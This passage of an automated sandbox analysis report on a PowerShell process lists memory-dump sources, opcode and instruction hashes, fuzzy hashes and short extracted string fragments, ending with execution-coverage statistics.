                                                                                            • Opcode Fuzzy Hash: a32da0301de3a78a9ec3d1949d40ed91b6a28b43a3dbd331e1ccc8c5108da6ec
                                                                                            • Instruction Fuzzy Hash: 42F0C272004344AEE7108E15D9C8B66FFD8EB52738F18C05AED494E686C679A880CAB1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2617391773.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_9a20000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 36236debca5ccfadbaaf4047d8450f0ff6b4352e9417194de990a5053d4dd88a
                                                                                            • Instruction ID: c88d7f6df068fcd446bd9e4def01415a3cb1d3ea771cf307f77fe657fcce951c
                                                                                            • Opcode Fuzzy Hash: 36236debca5ccfadbaaf4047d8450f0ff6b4352e9417194de990a5053d4dd88a
                                                                                            • Instruction Fuzzy Hash: 38F0F935A00519AFCB15DF88D9409ADFB76FF88320B648159E514A72A0C7329D62DB50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2608011324.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5180000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b646f378c51603c9d44a70c01b9b678ec100360e24a6e4d1191b7a949e404ce2
                                                                                            • Instruction ID: e02307f500c9ba946e1f42fe38f40fec147b04b69a071db24fdb2727b5789ad0
                                                                                            • Opcode Fuzzy Hash: b646f378c51603c9d44a70c01b9b678ec100360e24a6e4d1191b7a949e404ce2
                                                                                            • Instruction Fuzzy Hash: EFF01C706006069BEB14EBA4D555B6E7BB2EF80304F204814E5029F395CB79A9459F80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2608011324.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5180000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a52fbfb9e7857aed094d7ccae01fa928fd97a134c3814687bab74e1235329cad
                                                                                            • Instruction ID: 98fa023762a622906bea6b986b9b0fbbf996dc0f18320cabacd145490156e30c
                                                                                            • Opcode Fuzzy Hash: a52fbfb9e7857aed094d7ccae01fa928fd97a134c3814687bab74e1235329cad
                                                                                            • Instruction Fuzzy Hash: 3FE0ED74D042499FC755DFA884815A9BFF4AF19210B1085EEC95CDB222E6314652CBD5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2608011324.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5180000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                            • Instruction ID: f783109f5126caf99db402308033f5c95edf55478d3496edbd8e4108bdd0a7d4
                                                                                            • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                            • Instruction Fuzzy Hash: E3D067B0D042099F8794EFADC94156EFBF4EB59200F6085AE8919E7301E7329A528FD1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$4'eq$84tl$84tl$84tl$84tl$tPeq$tPeq$tPeq$tPeq$(kq$(kq$(kq$(kq
                                                                                            • API String ID: 0-1458600383
                                                                                            • Opcode ID: 996e17812a1e8b74369ceea79e1cf02ca42d6afa77ffb440c94c20b59019fd31
                                                                                            • Instruction ID: 1a3d242175d1e3ed4e6dbc2e3bf7cd9f2e941a26011a5f178d72a53bf773aaf5
                                                                                            • Opcode Fuzzy Hash: 996e17812a1e8b74369ceea79e1cf02ca42d6afa77ffb440c94c20b59019fd31
                                                                                            • Instruction Fuzzy Hash: 2361D8B1B101559FCB24DF59C540AAABBE2FF8A310F29809DE905AF385CB31DD41C7A1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$4'eq$tPeq$tPeq$#fk$$eq$$eq$$eq$ll$ll
                                                                                            • API String ID: 0-4217054718
                                                                                            • Opcode ID: d63c0af68391b5b4323fa99dcd64984c46e37140e65ed3777e51abc0dca94e6c
                                                                                            • Instruction ID: 0793da82dbcc4f1bef7447f13ce4f6e631d02bb7d64ff874b510232345691add
                                                                                            • Opcode Fuzzy Hash: d63c0af68391b5b4323fa99dcd64984c46e37140e65ed3777e51abc0dca94e6c
                                                                                            • Instruction Fuzzy Hash: D9A129B2704256CFCB15CA7A885177ABBA1EFC2210B1880AFD945CB692DA35C985C7A1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2617362584.0000000009A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A10000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_9a10000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 84tl$84tl$84tl$84tl$tPeq$tPeq$$eq$$eq$$eq
                                                                                            • API String ID: 0-1643725282
                                                                                            • Opcode ID: 9370ceef29a28b8ecca03104914804d850bf455a5338faf41b16ad8e3c41c1d5
                                                                                            • Instruction ID: 9c7dccf6a59db95a95d33ad2117f0410891afcd2adb9acd9484ab9fd1228e061
                                                                                            • Opcode Fuzzy Hash: 9370ceef29a28b8ecca03104914804d850bf455a5338faf41b16ad8e3c41c1d5
                                                                                            • Instruction Fuzzy Hash: C4D1D331B002149FCB15DFA8C85176ABBB6EFC8750F24846AEE159B391DB31DD41C7A1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2617362584.0000000009A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A10000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_9a10000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 84tl$84tl$84tl$84tl$tPeq$tPeq$tPeq$tPeq
                                                                                            • API String ID: 0-1039696944
                                                                                            • Opcode ID: 978d2a0a728931328dcd41f1cc9e5632ed8b81dcda03965a0cae4ed56b61a89c
                                                                                            • Instruction ID: e76f6ddab9c487c2ca61679565473d9b99b7a15b2e635f04f2a7c98728d198b0
                                                                                            • Opcode Fuzzy Hash: 978d2a0a728931328dcd41f1cc9e5632ed8b81dcda03965a0cae4ed56b61a89c
                                                                                            • Instruction Fuzzy Hash: 0EC1AB31B002199FCF159F58C440AAABBA6FF88760F288469FD159B395CB31DD51CBA1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2617362584.0000000009A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A10000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_9a10000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 84tl$84tl$84tl$84tl$tPeq$tPeq$tPeq$tPeq
                                                                                            • API String ID: 0-1039696944
                                                                                            • Opcode ID: f5192003a6728babdf490deb459ec3612fba8d9e58259dc20d8151a70837bca2
                                                                                            • Instruction ID: ec91176d61be6bb17f4609479a665732f94fd3cf888368e4bf73e37e234ec550
                                                                                            • Opcode Fuzzy Hash: f5192003a6728babdf490deb459ec3612fba8d9e58259dc20d8151a70837bca2
                                                                                            • Instruction Fuzzy Hash: 3091F271B002249FCB24DF68C455A6BBBE6FF88B54F25C469E9069B381DB31DD81CB90
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: tPeq$tPeq$$eq$$eq$$eq$$eq$ll$ll
                                                                                            • API String ID: 0-3746726750
                                                                                            • Opcode ID: cbeb50792f6ca29563523cc6496129212b01c2c20cde208aef4079c3f53a8333
                                                                                            • Instruction ID: be6aa90cc41def6d1dab790f61351d08221ca7ef2e5931b67debaa472453e0a8
                                                                                            • Opcode Fuzzy Hash: cbeb50792f6ca29563523cc6496129212b01c2c20cde208aef4079c3f53a8333
                                                                                            • Instruction Fuzzy Hash: 185129F1714349DFDB25DA6B8840B6ABBA6EF82310F1C806FE546CB283DA71C941C791
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 84tl$84tl$XRjq$XRjq$XRjq$tPeq$tPeq$$eq
                                                                                            • API String ID: 0-1252145711
                                                                                            • Opcode ID: 3305cffd4bdb251172a4c61582af5dfa3206c6d1a718ca1ec4f390dbc4aaebad
                                                                                            • Instruction ID: 647a29c5806964079d6806e87b6c1644f3557957e8450a87d2c3e11b2319501a
                                                                                            • Opcode Fuzzy Hash: 3305cffd4bdb251172a4c61582af5dfa3206c6d1a718ca1ec4f390dbc4aaebad
                                                                                            • Instruction Fuzzy Hash: 3B61D5B2B001069FCB25DF698444A6ABBE3AF85310F68C06DE4159F296CB35DE45CBA1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$84tl$TQjq$TQjq$tPeq$$eq$$eq$$eq
                                                                                            • API String ID: 0-4087309613
                                                                                            • Opcode ID: 638195291af662d270b135495e1ea6f7710fcda473aaee048a21005375c25be1
                                                                                            • Instruction ID: bd8981b7f96ec7a9699409ec0cee0302875bb11873af0eb2a63710356dfc2e98
                                                                                            • Opcode Fuzzy Hash: 638195291af662d270b135495e1ea6f7710fcda473aaee048a21005375c25be1
                                                                                            • Instruction Fuzzy Hash: 9E51D0F161020ADFCB34CE56C5847AAB7B2BF47311F19806EE9059B291D775DE80CBA1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$84tl$d%kq$d%kq$d%kq$tPeq$$eq
                                                                                            • API String ID: 0-3848635996
                                                                                            • Opcode ID: 8b6eb843706c353e18f75774b90887f25cc6338f503f84f8c31cd746829ce196
                                                                                            • Instruction ID: c038a55bdee59afcb5856e5c5d9eb560c895d2a4d5fa772d48813514110468d6
                                                                                            • Opcode Fuzzy Hash: 8b6eb843706c353e18f75774b90887f25cc6338f503f84f8c31cd746829ce196
                                                                                            • Instruction Fuzzy Hash: 2351F7F1B10216DFDB24CF15C590B6A7BB6BF86350F1880AED8059B292C735DE80CB91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fvl$(fvl$(fvl$(fvl$4'eq$4'eq
                                                                                            • API String ID: 0-1064887287
                                                                                            • Opcode ID: 3c1b883f02b671e57f93976a86cfff45041fe28fd4b5b2ed2906344c14597f3d
                                                                                            • Instruction ID: b108b97026b4ec14214cf9ef767aee6e163401432a1390b3eba3fe2392525668
                                                                                            • Opcode Fuzzy Hash: 3c1b883f02b671e57f93976a86cfff45041fe28fd4b5b2ed2906344c14597f3d
                                                                                            • Instruction Fuzzy Hash: 08026FB2A00209DFCB14CFA9C591A6ABBB3EF89314F14C16DD8159B745CB31DE46CB91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$4'eq$4'eq$4'eq$x.gk$-gk
                                                                                            • API String ID: 0-2006773526
                                                                                            • Opcode ID: 210d7268b30794670a3e16126d765d44108722886ae979e50843a5358434e26f
                                                                                            • Instruction ID: dfd8a4e6d17d56233cc8dfc40fe918a5a4ba7ca96b5b659d2b427fbb9da832e1
                                                                                            • Opcode Fuzzy Hash: 210d7268b30794670a3e16126d765d44108722886ae979e50843a5358434e26f
                                                                                            • Instruction Fuzzy Hash: 521240F4A002199FDB24DF64C951BDABBB2FB85304F1081D8D9096B741CB76AE85CF91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $eq$$eq$$eq$$eq$$eq$$eq
                                                                                            • API String ID: 0-220072568
                                                                                            • Opcode ID: 284502c525cf3adc1f669fe11594e4de6b270ae7de30d0de891f77ada796bcc3
                                                                                            • Instruction ID: 01e97b2f1c276707ae25f7eff5f6a5e1841ea504b613d3e7610c6466b01f8727
                                                                                            • Opcode Fuzzy Hash: 284502c525cf3adc1f669fe11594e4de6b270ae7de30d0de891f77ada796bcc3
                                                                                            • Instruction Fuzzy Hash: CF314BB2B1424FCFDB35CA66999917FB7A2ABC1211B28C0BFC442C7246DE31C555CB92
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$84tl$d%kq$d%kq$d%kq$tPeq
                                                                                            • API String ID: 0-1790688211
                                                                                            • Opcode ID: 70654891d2a00e3a8871e5f357054133cde83637ddf24cc0235d3ec712611a51
                                                                                            • Instruction ID: a0ec7c71a9480f21b5bfd7019ccd3637b88cb26b375b556cee65df823e8f638b
                                                                                            • Opcode Fuzzy Hash: 70654891d2a00e3a8871e5f357054133cde83637ddf24cc0235d3ec712611a51
                                                                                            • Instruction Fuzzy Hash: 223184B1B101159FCB24DF59C484A6ABBB3FB89714F158099E9059B342C732ED51CB90
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 84tl$84tl$tPeq$tPeq$$eq
                                                                                            • API String ID: 0-2059710063
                                                                                            • Opcode ID: a7583cb023fc122553797b30c5ec274b784e68765f58cb122b75e5e6f9a6ac14
                                                                                            • Instruction ID: 71b1b4b97cdb66079b1c66d267a2d55b2b4f4dfccf518a771fc77a8f1e079496
                                                                                            • Opcode Fuzzy Hash: a7583cb023fc122553797b30c5ec274b784e68765f58cb122b75e5e6f9a6ac14
                                                                                            • Instruction Fuzzy Hash: A861F7B1B001059FCB25DF69C444A7ABBE2EF86710F18C06DE8059F285CB35DE41CBA1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$4'eq$$eq$$eq$$eq
                                                                                            • API String ID: 0-2942138008
                                                                                            • Opcode ID: d95e83060bc728a6074d6878ea528e2284020abf70aecd14ab01bcd615b4682c
                                                                                            • Instruction ID: 69414da1860aa815dc9d0ae328414b71d39912b8f40925579fe77e571e256454
                                                                                            • Opcode Fuzzy Hash: d95e83060bc728a6074d6878ea528e2284020abf70aecd14ab01bcd615b4682c
                                                                                            • Instruction Fuzzy Hash: F341F5F1B14606DFCB25DF259C206BA7FA29FC2210F14406EDA05CB692DB35CAD5C7A2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$4'eq$$eq$$eq$$eq
                                                                                            • API String ID: 0-2942138008
                                                                                            • Opcode ID: 456a06f0c9294725c60a42c6474f1e445d207726df877877adb01fc372de3f5a
                                                                                            • Instruction ID: fbd17588e5458254379bbd6edec0dff114915256e9674932b0a7e66d269be4bc
                                                                                            • Opcode Fuzzy Hash: 456a06f0c9294725c60a42c6474f1e445d207726df877877adb01fc372de3f5a
                                                                                            • Instruction Fuzzy Hash: D7413EF5710617DFCB25CE29E48017AB793EF81211B7881AFE9118B291DB31E661C711
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$tPeq$$eq$$eq$$eq
                                                                                            • API String ID: 0-2181669348
                                                                                            • Opcode ID: 3f8af211e95fcd88ec3a40ee4a2694ee5024368e86e82a05754cfb899181989b
                                                                                            • Instruction ID: 40d1b7496afb2722040723e3d09e42e563d4fd4691cc669b53312b4d2dbf6c66
                                                                                            • Opcode Fuzzy Hash: 3f8af211e95fcd88ec3a40ee4a2694ee5024368e86e82a05754cfb899181989b
                                                                                            • Instruction Fuzzy Hash: D231D3F1A1020DEFDB24CE15C589BAEB7B2BB89320F18C06ED9159B291D731DA80CB51
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2617362584.0000000009A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A10000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_9a10000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: tPeq$$eq$$eq$$eq$$eq
                                                                                            • API String ID: 0-2959799000
                                                                                            • Opcode ID: b1d5811860304d2c034eacbc93922ccf9526e5f44322e1673567d6fa762eff5c
                                                                                            • Instruction ID: ce4814a4c566ff357b5585ff94540918db1167a4abc730873e2e164768f10ee6
                                                                                            • Opcode Fuzzy Hash: b1d5811860304d2c034eacbc93922ccf9526e5f44322e1673567d6fa762eff5c
                                                                                            • Instruction Fuzzy Hash: 4421F532600235DFDBA48F95C980A6BB7B9EF95B50F29406AFE049B351CB31DD80CB61
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (oeq$(oeq$(oeq$(oeq
                                                                                            • API String ID: 0-182854655
                                                                                            • Opcode ID: 52d5e395a5810f331d4d8800cba75a9880d343db30705fc5faaa57a3f9a9715a
                                                                                            • Instruction ID: 1dd7b07dbc1f6e092ae8156bc539dfd24680da8380b9f0948e34c1220c7349d6
                                                                                            • Opcode Fuzzy Hash: 52d5e395a5810f331d4d8800cba75a9880d343db30705fc5faaa57a3f9a9715a
                                                                                            • Instruction Fuzzy Hash: 86F116B1B04305DFCB15DF69D89476ABBA2EFC1310F1480BEE9168B291CB31DA95C7A1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 84tl$84tl$tPeq$tPeq
                                                                                            • API String ID: 0-328078591
                                                                                            • Opcode ID: ba247fdf3ee0bc83a0d3529035dee3dbb666c5436613b5cda0e9cff463a96bb4
                                                                                            • Instruction ID: ad34f364f11af131d7bc8939d8b2633df6065303e27e9cee29986d965026ab4a
                                                                                            • Opcode Fuzzy Hash: ba247fdf3ee0bc83a0d3529035dee3dbb666c5436613b5cda0e9cff463a96bb4
                                                                                            • Instruction Fuzzy Hash: F99159B17002169FCB15CF69D980A7BBBA6AFC5310F38C46ED905DB281DB31EA51C7A1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (fvl$(fvl$(fvl$(fvl
                                                                                            • API String ID: 0-993764349
                                                                                            • Opcode ID: 91cc72925ad39b0dc327787a7af84475e5bbc4f42432f12150daf6b276c43b8a
                                                                                            • Instruction ID: fe230fd7c5f8007f131238ac2fa39d69f62ba87b777413186839bd00d8b77275
                                                                                            • Opcode Fuzzy Hash: 91cc72925ad39b0dc327787a7af84475e5bbc4f42432f12150daf6b276c43b8a
                                                                                            • Instruction Fuzzy Hash: 68718AB4A00205DFDB14CFA8C595AAFBBE2EF89310F18806DD915AB755CB31EE41CB91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,Svl$,Svl$p5fk$xSvl
                                                                                            • API String ID: 0-3353569555
                                                                                            • Opcode ID: 2f2b57db4998febc00156fa7cf0bf4898a016ff94d2aab07e54c6f2385a896a3
                                                                                            • Instruction ID: 58f2b771f2d5b1ccd8a982922d0906801b1e3eb8129dd5f9fea31ea371e257de
                                                                                            • Opcode Fuzzy Hash: 2f2b57db4998febc00156fa7cf0bf4898a016ff94d2aab07e54c6f2385a896a3
                                                                                            • Instruction Fuzzy Hash: 0E4129B1B052059FC710DF39841276ABFE19FC6310F14806ED919CB692DB35EA81C7A2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $eq$$eq$$eq$$eq
                                                                                            • API String ID: 0-812946093
                                                                                            • Opcode ID: caf2245fbc8819433287b852ef30fbf864cce28081dcab2cc85afb16f5ecc8a4
                                                                                            • Instruction ID: 65b1b69d081a6409c33fad3f4dedcda67b9335793831dce6dc920d1f24290d41
                                                                                            • Opcode Fuzzy Hash: caf2245fbc8819433287b852ef30fbf864cce28081dcab2cc85afb16f5ecc8a4
                                                                                            • Instruction Fuzzy Hash: 19213BF27102869BDB34D97AA942B27BBD69BC2711F24C02ED505CB381DE75C9418373
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2613918745.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7cc0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'eq$4'eq$$eq$$eq
                                                                                            • API String ID: 0-3287427201
                                                                                            • Opcode ID: 6fc0679706cc0efa7714f928e05147f539461b3a3ba726fe941d07d64975cb0c
                                                                                            • Instruction ID: c26fc8bb927126a46ed659dc7cb3833f937d769bf3c913b524ab4d5c39b9e31a
                                                                                            • Opcode Fuzzy Hash: 6fc0679706cc0efa7714f928e05147f539461b3a3ba726fe941d07d64975cb0c
                                                                                            • Instruction Fuzzy Hash: D001A26120A7868FC7275239582016A6FB36FC366072E42EBC081CF2A7C9148D4983A7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2608011324.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5180000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: p$p$p$p
                                                                                            • API String ID: 0-3467077657
                                                                                            • Opcode ID: 355761628e1da63292496a9fb734576aa028cfa7117673fe52f8bbeaba85b1d1
                                                                                            • Instruction ID: cb2aa7bdd464d061fdab8ebcaf7647de7a7196ab0a3ae9d1f7adab26d0deee44
                                                                                            • Opcode Fuzzy Hash: 355761628e1da63292496a9fb734576aa028cfa7117673fe52f8bbeaba85b1d1
                                                                                            • Instruction Fuzzy Hash: 24F0E296C08682E7F2302165AD9E3692310DBF1BC0F4C0B824DB42A2CBE808180A87C2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2608011324.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_5180000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: p$p$p$p
                                                                                            • API String ID: 0-3467077657
                                                                                            • Opcode ID: 7a1951f39f4fb11442e40744c7c35839d4bb7872d704a331a204d5a6a709523d
                                                                                            • Instruction ID: 2be991d6ff14a7106a3ff9ace569a733fbb4247d4ea5582985e3d9e717b7db18
                                                                                            • Opcode Fuzzy Hash: 7a1951f39f4fb11442e40744c7c35839d4bb7872d704a331a204d5a6a709523d
                                                                                            • Instruction Fuzzy Hash: F8E0C757C0E6D29AE32656257D693A53B608F53698F4907C78CA85A0D3B80C190A86D5

                                                                                            Execution Graph

                                                                                            Execution Coverage:1.9%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:1.3%
                                                                                            Total number of Nodes:1651
                                                                                            Total number of Limit Nodes:1
